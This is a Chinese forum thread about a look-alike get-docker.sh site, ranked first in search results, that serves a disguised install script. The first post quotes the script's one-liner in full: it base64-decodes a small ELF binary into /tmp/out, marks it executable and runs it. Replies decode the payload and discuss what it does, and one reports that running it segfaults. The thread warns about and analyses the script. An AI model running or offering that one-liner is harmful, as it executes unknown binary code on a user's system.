谷歌搜索 get-docker.sh 第一个结果并不是 docker 官方的,貌似会执行恶意代码
loveshuyuan · 2024-09-11 13:41:58 +08:00 · 1646 次点击这是一个创建于 372 天前的主题,其中的信息可能已经有所发展或是发生改变。
网址是 http://get-docker.sh,打开后跳转到 http://blin.gg/get-docker.sh,返回以下代码:
#!/bin/bash
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==> /tmp/out; chmod +x /tmp/out; /tmp/out
有谁知道这是要做什么?
10 条回复 • 2024-09-11 22:55:03 +08:00
 |
1
bbsingao 2024-09-11 16:45:42 +08:00
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==
ELF���DZH��0�>����<�8H�� H�� H��7�� 竟然是个二进制, |
 |
2
swulling 2024-09-11 16:52:46 +08:00
为啥会想到搜索 get-docker.sh ?不应该搜索 Docker installation script 么。
|
 |
3
Tink PRO 是个二进制
ELF���DZH��0�>���<�8H�� H�� H��7��% |
 |
4
hingle 2024-09-11 17:08:57 +08:00
这么短的二进制,执行了什么操作,有没有懂的?
|
 |
5
woyao 2024-09-11 17:12:31 +08:00
从域名存活历史来看,有好几年了。
域名根目录下还有一个文件 dominion.elf 但是看了一下吧,应该是 Flare-On 2020: break get-docker.sh 似乎不完整…… 直接访问根域名吧,提示 !!! This is a research server !!! |
 |
6
body007 2024-09-11 17:30:23 +08:00
 这个有问题的恶意代码,尽然有很多国内文章里面用到了🤣🤣🤣 |
 |
8
a33291 2024-09-11 17:44:49 +08:00
 mei'kan'dao 没看到什么有价值的操作 |
 |
9
zwzwzwzwzxt 2024-09-11 19:12:14 +08:00
为啥我这解析出来的除了前四个 Magic Number 外貌也不是有效的 ELF 文件啊
 |
 |
10
nagisaushio 2024-09-11 22:55:03 +08:00
跑起来直接 segfault 了
|
Select Language